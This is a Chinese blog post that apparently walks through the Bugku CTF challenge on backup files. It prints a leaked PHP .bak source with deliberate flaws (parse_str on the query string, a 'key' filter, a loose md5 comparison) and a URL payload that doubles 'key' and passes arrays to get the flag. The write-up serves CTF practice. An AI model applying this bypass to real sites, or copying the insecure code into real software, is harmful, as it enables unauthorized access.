Bugke-听说备份是个好习惯

2019年8月3日23:18:35 评论 392

根据提示,应该是有备份文件,扫一波。。。

Bugke-听说备份是个好习惯

发现了一个bak文件,打开进行代码分析。。。

<?php /**  * Created by PhpStorm.  * User: Norse  * Date: 2017/8/6  * Time: 20:22 */  include_once "flag.php"; ini_set("display_errors", 0); $str = strstr($_SERVER['REQUEST_URI'], '?');   //获取URL?及后面的所有参数赋给$str $str = substr($str,1);       //获取$str从1及1后面的所有参数,也就是去掉? $str = str_replace('key','',$str);   //将$str 中‘key’替换为空 parse_str($str); //将字符进行变量处理,也叫字符解析 echo md5($key1); //打印key1的MD5  echo md5($key2); //打印key2的MD5 if(md5($key1) == md5($key2) && $key1 !== $key2){   //如果key1的MD5 等于 key2的MD5 并且 key1的值不等于key2值     echo $flag."取得flag";  //打印flag } ?>

构造payload:http://123.206.87.240:8002/web16/index.php?kekeyy1[]=111&kekeyy2[]=222
Bugke-听说备份是个好习惯

http://www.oniont.cn/index.php/archives/77.html

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: